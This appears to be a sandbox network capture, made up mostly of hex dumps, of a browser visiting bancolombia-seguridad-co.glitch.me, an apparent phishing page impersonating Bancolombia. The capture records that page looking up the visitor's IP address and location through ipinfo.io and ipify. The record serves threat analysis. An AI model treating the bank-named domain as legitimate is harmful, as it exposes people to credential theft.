                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: 8e d1 6a cf 6f bf 00 dd 1d 21 d4 7b 6e a5 e9 8e 37 9c db c4 56 9b fc 15 c9 6a 44 f7 a2 99 3e 6e 4c 7a fa fb 99 22 d5 f8 95 1d 80 01 92 3c c4 f5 85 b9 de bc cb c6 e1 c9 17 e3 f8 28 9d a6 28 ac c4 c7 b7 9d 27 71 6f 87 bf 11 8e 7f 31 2a aa d4 1a 0b cb 3f 87 38 f2 4d fa db 91 c7 de ee 5a f8 38 6a 5b d1 ac 6b 5c d9 f4 f7 bb 71 d7 f7 dd 9e 89 58 56 87 54 00 00 00 01 49 f9 91 f0 e7 17 25 c3 7f cd dc 7e 2d 39 1e 36 b1 5e 42 b4 8e dc db 5d 74 ef ce 9f 8d 87 5d 75 fc 9d 75 f9 b0 95 59 89 05 81 e0 6f 57 64 e9 cf 10 b8 fe fd e6 36 3c a5 a3 61 bc a7 ab 4c d3 11 8a d3 ac c4 47 73 2f 76 66 7f 27 5f 75 46 c9 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: jo!{n7VjD>nLz"<(('qo1*?8MZ8j[k\qXVTI%~-96^B]t]uuYoWd6<aLGs/vf'_uFT
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: fa be b7 db 6e b7 51 b1 e2 ef d9 fd 5d b3 d7 1e 3b 47 6f f2 b6 d6 6f 93 b2 7b 62 d3 dd f5 f7 60 10 44 1f aa d6 d7 b4 52 91 36 b5 a7 4a d6 3b 66 66 7d 11 10 0d 59 e0 27 85 39 3a 57 8d bf 39 cc 62 9a 73 fc 8e 38 ad 70 5b d3 b6 db cc f7 bb 93 1f 97 79 88 9b fb 9d 91 d9 f2 b5 a2 db 54 00 02 62 2d 13 13 1a c4 f6 4c 4f a2 60 19 47 c7 0f 07 73 f4 be ff 00 27 3b c2 e1 b6 4e 9c dd de 6d 92 94 8d 7e 87 92 d3 f3 2d a7 f8 ab 4f cc b7 ab e6 cf ab bd 15 52 20 e9 f0 1d 49 cf 74 fe fe bb fe 17 7d 97 63 ba ae 9a df 15 b4 8b 44 4e bd db d6 75 ad eb af e2 da 26 14 5d 3d 35 e6 a7 7f 8a b4 c3 d4 9c 45 37 3a 76 5f 79 b2 bf b3 be 9e ec e1 bf 7a b6 9f 82 f5 83 4c 4d 76 3e 66 7c 35 dc d6 67 37 d3 b6 53 13 a7 77 36 08 b6 bd 9e 98 f6 37 ca 6a 63 f5 bd f3 2f e1 a6 de 9d ec 36 de ef
                                                                                                                          Data Ascii: nQ];Goo{b`DR6J;ff}Y'9:W9bs8p[yTb-LO`Gs';Nm~-OR It}cDNu&]=5E7:v_yzLMv>f|5g7Sw67jc/6
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: e4 b4 eb 7b ed f5 ec b5 6d db 33 4f 4c 7e 2e ba e9 13 15 43 f2 3c 57 27 c6 6e 27 6f c8 ec f3 ec b7 11 db 38 77 18 ef 8a ff 00 c1 bc 56 41 26 e9 0f 09 fa e7 aa 77 18 eb b0 e3 72 e1 d9 df 49 b7 21 ba ad b0 ed eb 59 fc 68 bd a3 e5 fc 14 8b 48 35 8f 87 7e 1f 71 1d 0f c0 53 8c d8 cf b6 dc 64 98 c9 bf df 5a b1 5b e7 cb ee cc 46 bd da d7 d1 4a eb d9 1e ec cc cc d4 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 c0 eb ee 9f 8e a1 e8 ce 67 87 8a 46 4c bb bd ae 48 db d6 7d 1e de 91 df c3 3f 16 4a d6 41 85 59 50 00 00 00 00 7d 76 bb 9c fb 5d ce 2d ce de f3 8f 3e 0b d7 2e 1c 91 e9 ad e9 3d ea da 3e 09 85 1b ef 8b e4 36 fc 97 19 b4 e4 36 f6 ef 6d f7 98 71 ee 30 da 3d 74 cb 48
                                                                                                                          Data Ascii: {m3OL~.C<W'n'o8wVA&wrI!YhH5~qSdZ[FJJgFLH}?JAYP}v]->.=>66mq0=tH
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: 6c a2 aa e4 00 00 00 00 00 07 ef 1e 4c 98 b2 57 26 3b 4d 32 52 62 d4 bd 66 62 d5 b4 4e b1 31 31 e8 98 06 de f0 cf ab 27 aa fa 27 8c e6 72 4c 7d 2b 2e 3f 67 bd 8a f6 44 67 c5 33 4c 93 a7 ab bd 35 ef 44 7b 92 d2 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 f5 bf 49 ec 7a b3 a6 37 dc 1e f3 4a d7 75 4f d0 e6 d3 59 c5 9a bf 2b 1e 48 f4 7c db 44 6b 1e b8 d6 3d 60 c3 bc b7 15 be e2 79 3d d7 19 bf c5 38 77 9b 3c b6 c3 9f 1c fa ad 49 d2 74 f7 63 dc 9f 5c 22 bc 88 00 00 00 00 00 00 00 00 00 36 e7 84 fd 41 3c f7 87 7c 1f 21 7b 4d f3 fd 1a bb 7d c5 ad 3a da 72 ed a6 70 de d6 f7 ed 38 fb df 1b 48 96 80 00 00 00 00 16 b4 56 26 d6 9d 22 3b 66 67 d1 10 08 4f 51 f8 cf e1 bf 03 17 ae e7 99 c5 b9 dc d3
                                                                                                                          Data Ascii: lLW&;M2RbfbN11''rL}+.?gDg3L5D{%Iz7JuOY+H|Dk=`y=8w<Itc\"6A<|!{M}:rp8HV&";fgOQ
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: dd f7 1f f6 b6 1f ab 6e 12 91 96 51 40 01 a0 7c a6 ff 00 de 3a 9f f3 36 5f b7 9d 61 5a 21 50 06 42 f3 15 f7 a9 c8 ff 00 33 b5 fd 45 52 ac 56 68 00 03 63 f8 01 f7 47 c0 ff 00 4b fa ee 66 91 61 00 00 00 a0 bc d7 f2 b1 5d 97 4f f1 35 98 99 cb 93 3e ef 24 6b db 1e ce b5 c7 4e cf 7f da 5b f0 25 58 ce 68 00 03 51 f9 59 d8 ce 2e 87 e4 77 76 a4 d6 77 3c 8d eb 5b 4f e3 53 16 1c 71 13 1f be b5 a1 61 57 32 a2 0d e3 7f dd 5f 50 7f 33 8f f5 f8 c1 8b d9 50 00 58 7e 00 7d ee 70 3f d2 fe a5 99 46 c6 54 01 9c 7c c6 f8 a3 93 3e ea fd 17 c4 67 d3 6d 82 62 79 9c d4 99 d6 f9 3d 35 db eb 1d 9d da 7a 6f fb ae cf c5 94 aa a1 10 00 07 4b 84 e9 ce 7b 9d dc ce d7 86 e3 f3 f2 19 eb a7 7e bb 7c 76 bf 72 2d 3a 44 de 62 34 ac 7b f6 ec 51 60 f1 7e 5b 7c 4d de e3 ef e7 c1 b4 e3 7d ca ee
                                                                                                                          Data Ascii: nQ@|:6_aZ!PB3ERVhcGKfa]O5>$kN[%XhQY.wvw<[OSqaW2_P3PX~}p?FT|>gmby=5zoK{~|vr-:Db4{Q`~[|M}
                                                                                                                          2024-10-13 16:20:41 UTC8000INData Raw: b2 33 52 3b f4 88 8f 76 97 94 c5 d5 47 d4 9e 0f f8 89 d3 d6 bd b7 bc 36 6c db 7a eb 3f 4b da 47 d2 71 77 6b db 36 99 c7 de b5 23 f3 e2 01 0c 40 00 00 00 00 00 00 00 00 7a 36 3c 7e ff 00 90 dd 53 69 b0 db 65 dd ee b2 7f 27 b7 c1 4b 64 c9 6d 3b 7b 29 48 99 95 16 3f 4b f9 78 f1 13 9a 9a 64 de 6d e9 c3 6c ed a4 ce 5d ed b4 cb dd d7 b7 bb 82 9d eb f7 bd eb f7 7e 13 05 c1 d2 3e 5b 7a 1f 87 9a 67 e5 ed 93 9d de 57 49 fd 3f e8 b6 d1 31 3a c4 c6 0a 4c cc fb 93 17 bd a2 7d c5 c4 5a bb 5d a6 d7 69 b7 a6 db 6b 86 9b 7d be 28 ee e3 c3 8a b1 4a 56 23 d5 5a d6 22 22 01 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 de 7f c1 ff 00 0e ba 83 97 dc 72 fc bf 11 f4 9e 47 75 dd f6 f9 fe 91 ba c7 de ee 52 31 d7 e4 e3 cb 4a c6 95 ac 47 64 03 9f fd c0 78 47 ff 00 01 ff 00
                                                                                                                          Data Ascii: 3R;vG6lz?KGqwk6#@z6<~Sie'Kdm;{)H?Kxdml]~>[zgWI?1:L}Z]ik}(JV#Z""rGuR1JGdxG
                                                                                                                          2024-10-13 16:20:41 UTC2530INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.44974834.117.59.814432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:41 UTC616OUTGET / HTTP/1.1
                                                                                                                          Host: ipinfo.io
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Origin: http://bancolombia-seguridad-co.glitch.me
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:42 UTC457INHTTP/1.1 200 OK
                                                                                                                          access-control-allow-origin: *
                                                                                                                          Content-Length: 319
                                                                                                                          content-type: application/json; charset=utf-8
                                                                                                                          date: Sun, 13 Oct 2024 16:20:42 GMT
                                                                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                                                                          x-content-type-options: nosniff
                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                          via: 1.1 google
                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-10-13 16:20:42 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                                                                                                                          Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449747172.67.74.1524432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:41 UTC632OUTGET /?format=json HTTP/1.1
                                                                                                                          Host: api.ipify.org
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Origin: http://bancolombia-seguridad-co.glitch.me
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:42 UTC249INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:42 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 20
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Vary: Origin
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d20a892de0743cb-EWR
                                                                                                                          2024-10-13 16:20:42 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                          Data Ascii: {"ip":"8.46.123.33"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449753104.26.13.2054432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:42 UTC349OUTGET /?format=json HTTP/1.1
                                                                                                                          Host: api.ipify.org
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:42 UTC217INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:42 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 20
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d20a896eafb8c42-EWR
                                                                                                                          2024-10-13 16:20:42 UTC20INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                                                                                                          Data Ascii: {"ip":"8.46.123.33"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449751162.214.111.334432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:42 UTC651OUTGET /wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg HTTP/1.1
                                                                                                                          Host: mtmarketing.co
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:42 UTC209INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Server: Apache
                                                                                                                          Last-Modified: Tue, 27 Jul 2021 13:06:21 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 648805
                                                                                                                          Connection: close
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          2024-10-13 16:20:42 UTC7983INData Raw: ff d8 ff e1 00 8b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 0f 00 02 00 00 00 08 00 00 00 56 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 5e 01 1b 00 05 00 00 00 01 00 00 00 66 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 15 00 00 00 6e 00 00 00 00 42 65 46 75 6e 6b 79 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 42 65 46 75 6e 6b 79 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                          Data Ascii: ExifMM*V^f(1nBeFunky,,BeFunky Photo EditorJFIF,,CC
                                                                                                                          2024-10-13 16:20:42 UTC8000INData Raw: e8 35 d6 3f 33 44 10 27 c2 dd 2e 3e 4a 22 46 a4 6d bf c3 7a 2b 1a 1c 0d cc 88 d2 4a 11 1f 10 27 cc 1d 60 d1 5e 90 36 8d 3a 51 50 98 19 80 12 34 91 3d 3e 6b 42 34 20 69 a1 f5 a2 85 c4 b8 c9 8f 21 0a 12 08 30 68 a8 a9 22 41 1f 2f 7d 11 44 50 47 4d c0 ff 00 b5 31 cb c8 cd 58 e6 92 64 46 9f 54 fb e6 a3 31 1e 20 08 1c f7 e8 36 e5 f0 f8 f2 ab 0b 4b 62 62 e9 24 eb 1d 20 47 aa 89 49 29 e9 1c ba fc 7d 3d 6a d4 54 90 0e e0 1f 7d 11 46 53 19 8e 9e 5e 5a 88 f7 45 14 79 1f 04 99 80 26 e4 dc 74 fd e1 50 75 df 5f 7e b4 49 2e 01 a0 90 45 ce d3 e9 d4 a8 54 92 0c e9 1a e9 ef d4 7e 46 8a f6 88 69 06 f2 41 e7 b1 e6 bc ee e3 64 ab fd b3 e2 ed 3f fa 67 c7 f9 8f fe aa dd f9 d7 c4 dd ab ff 00 4a 7b 4b fe df e3 1f f1 1c 4a fa fb b3 3f e8 e7 67 ff 00 d8 9c 2b ff 00 01 87 5b 63 22
                                                                                                                          Data Ascii: 5?3D'.>J"Fmz+J'`^6:QP4=>kB4 i!0h"A/}DPGM1XdFT1 6Kbb$ GI)}=jT}FS^ZEy&tPu_~I.ET~FiAd?gJ{KJ?g+[c"
                                                                                                                          2024-10-13 16:20:42 UTC8000INData Raw: 37 b4 fb 7b 1c 2d 16 e8 6d ab 1b ab 9b 82 eb 97 b0 13 99 4a ce a4 6a 09 5f 5f c3 5d a7 0a e3 79 44 1a 9a 8e 7e 04 45 ed 6f 91 9d c6 7e 1f 19 b1 31 3a 5f e1 71 e8 0e 90 76 5e a9 f6 75 ed 8d d8 e7 1d 58 b0 b6 71 cc 35 2e bc da 48 ee f2 48 2a 20 6f de 91 ac ce dd 39 83 5d 5d 1e 35 25 a7 3d c4 6f ad bc 26 c6 04 c8 bc c2 d8 fb 7b 36 fc e0 47 31 ca 40 f0 b7 4d 4a e7 bc 2b 8a 38 5b 1f 5a 5c c3 b1 b0 b4 2a 0a 72 10 04 1d a2 09 89 fd 37 ad ad 3e 32 44 90 ed 63 7f 3b 45 fa 6b 78 37 57 7b 6b ba e2 c2 22 76 3e 11 e5 7e 67 4b ac dd e6 22 96 14 6d 9b b3 66 e5 94 1f 0d ea e7 3b 89 da 4e b1 a0 13 d3 7d 74 a9 9d c6 5d 96 4b a2 64 eb e7 ce 23 ec 01 75 4f 6d dd 6c ba 07 df 58 8f 8f 5b ac 15 e7 14 70 de 12 ca ee 71 4c 5f f8 78 4a 54 a5 01 97 2a 42 44 9d c8 eb 04 69 fa 56 be
                                                                                                                          Data Ascii: 7{-mJj__]yD~Eo~1:_qv^uXq5.HH* o9]]5%=o&{6G1@MJ+8[Z\*r7>2Dc;Ekx7W{k"v>~gK"mf;N}t]Kd#uOmlX[pqL_xJT*BDiV
                                                                                                                          2024-10-13 16:20:42 UTC8000INData Raw: 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 8b d5 07 52 44 65 1a 10 67 e1 ef d7 e5 5f a0 0b e1 7d c8 dc 6a ac ca 54 a2 76 80 4c 4f 4f 87 eb 54 20 1d 42 79 03 e3 3f 22 14 75 02 bd 84 09 93 1a 7c d2 a8 40 22 fa 78 c2 95 06 86 46 f2 3d 36 a9 29 eb 6d 22 de e5 42 5b b9 16 33 ae e1 5f b6 01 12 9d c0 9d 3a e9 53 00 49 1c a6 fe 1f d6 14 8c d7 cb e6 15 cd 4a 33 02 07 f0 8f 0e 5e ba ac b6 cc 0f bf 0f 72 b8 f7 a4 ab 9c 0d 09 e6 3e b5 72 9d a0 40 3b f8 aa c0 cc a9 29 20 19 90 7e be fa 2b e3 7f 98
                                                                                                                          Data Ascii: (DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(RDeg_}jTvLOOT By?"u|@"xF=6)m"B[3_:SIJ3^r>r@;) ~+
                                                                                                                          2024-10-13 16:20:42 UTC8000INData Raw: d7 d6 e2 65 db 12 62 3e a0 1b 46 d3 d0 f8 2d 6e 27 0e 60 92 23 2d ef 6d 00 26 00 f8 f3 d2 ea 7e e8 36 e8 5b 88 24 18 d3 de 66 4e e0 72 d7 e7 bd 68 eb d6 35 a7 29 83 f0 d6 c6 ff 00 7e e1 76 17 13 ec 9c d2 d3 70 45 ba 03 7b 9d 01 8f 89 ea b7 f7 06 71 c6 2b c0 7c 43 63 8e e0 57 2b b5 b9 b4 5b 2b 0e b5 f8 80 43 ad b8 a4 e8 46 be 1d a4 ea 39 99 ad 37 10 e1 0d e2 58 5a 94 2b b0 d4 6b a4 e9 3a 48 9b 8f b1 6f 1f 4c ec ff 00 69 ce 0e b5 27 07 16 c0 00 dc 4e a2 f0 76 37 37 bf 86 ff 00 62 5f 65 bf da 29 86 76 a3 c2 76 7c 0d c7 78 96 6c 61 0f b3 67 6c 6f ee 72 28 b3 6c 95 db 8c a8 52 96 4a 48 ee f6 d2 23 96 ff 00 2a 7e 25 76 24 e1 2a bd ed a6 0d 3c a5 d9 9a d1 0d 98 31 31 ad e7 c4 6e 57 d6 7d 84 ed b9 ad 45 99 6a 1d 40 37 e5 3e ef 8a f7 59 0a 45 a3 b6 98 85 92 83 d6
                                                                                                                          Data Ascii: eb>F-n'`#-m&~6[$fNrh5)~vpE{q+|CcW+[+CF97XZ+k:HoLi'Nv77b_e)vv|xlaglor(lRJH#*~%v$*<11nW}Ej@7>YE
                                                                                                                          2024-10-13 16:20:42 UTC8000INData Raw: 43 d0 21 73 9d a9 25 33 aa 39 7b e3 5f a7 a5 56 06 b1 7e 6a c8 1c 87 a2 66 51 e7 fa 7e 55 7b 6a 3d ba 1f 04 0d 02 e0 2b fb 47 12 d1 0f 2a 7c 23 2f 9c 9d 39 03 e7 26 3d d1 59 cd 14 6a d1 77 b5 6e 6d cd c4 93 7e 9a db 49 f8 de 17 ba b3 5c 05 37 41 91 7d 3e 77 d7 43 3b eb 75 dd df 63 0f 6a 2c 7f d9 cf b4 ac 1f 89 ad 2f 2e 9b b3 b6 b9 53 8e 36 d9 75 41 59 dd 69 43 c2 15 97 64 9f e9 f7 73 07 c9 fb 71 d9 aa 5c 66 85 53 49 ad f6 8d 69 6b 73 01 37 9b c0 12 4e f3 cd 7b 07 61 38 e5 7c 1d 6a 2c ab 50 c1 20 9b db 58 bc db 6d a0 59 7d d9 fb 34 fb 42 60 5e d1 3d 9e e0 fc 51 85 5f b2 ee 3b 69 87 da 24 b7 f7 84 2d ee fd d4 15 2c 16 86 55 c8 20 08 dc 18 af 84 fb 77 d9 43 42 b6 21 be ca 0b 5c f0 4e 58 e7 a6 f7 b6 96 93 3d 17 db 9d 86 ed 40 7b 29 34 54 17 cb a9 b7 98 27 c7
                                                                                                                          Data Ascii: C!s%39{_V~jfQ~U{j=+G*|#/9&=Yjwnm~I\7A}>wC;ucj,/.S6uAYiCdsq\fSIiks7N{a8|j,P XmY}4B`^=Q_;i$-,U wCB!\NX=@{)4T'
                                                                                                                          2024-10-13 16:20:43 UTC8000INData Raw: 79 d4 d3 66 50 9d dd 1a 86 43 5a e6 b1 ad 8b b4 92 1d 3f cc 77 82 76 88 d2 f7 2b 85 c7 b8 b2 ab a9 d4 69 ae 6a 10 3f bd b6 59 0d 82 04 08 81 de 1b 9b 44 5a 3c 2a be e1 4c 2f 87 7b 42 7f 0a 38 a3 d8 5d e2 6f 1b 16 ee 62 0d b9 83 61 56 40 2c 94 a6 ed e7 50 ab d6 09 09 40 69 20 32 96 d9 28 75 fb a7 15 2e 1e 83 21 ad 86 c8 32 54 24 38 64 2d ef 3c 17 5c 02 5c 00 91 20 19 d2 da ad 1e 13 d9 e1 f1 ed cc fa cc aa 2a 13 4e ab 89 14 a9 35 ae be 62 1a e9 63 a2 44 0b 58 41 30 57 b9 fe ce 4f 62 98 4f 0b b2 f2 f0 bc 36 fe ca ff 00 b8 7a f6 eb 86 6f 57 74 2e 6d 4a 02 42 93 8d d8 95 d8 e2 6b 2b 42 9f 36 98 b3 97 19 d2 a5 a9 0b 2a 01 15 87 82 c3 7b 07 56 a6 fc 3b f0 c2 5a 58 1b 17 63 4d 86 70 5c d3 9a fd db 10 0c 93 a1 5d f7 15 ae dc 5d 0c 3b c6 26 93 ea 35 a4 31 c5 c5 ec
                                                                                                                          Data Ascii: yfPCZ?wv+ij?YDZ<*L/{B8]obaV@,P@i 2(u.!2T$8d-<\\ *N5bcDXA0WObO6zoWt.mJBk+B6*{V;ZXcMp\]];&51
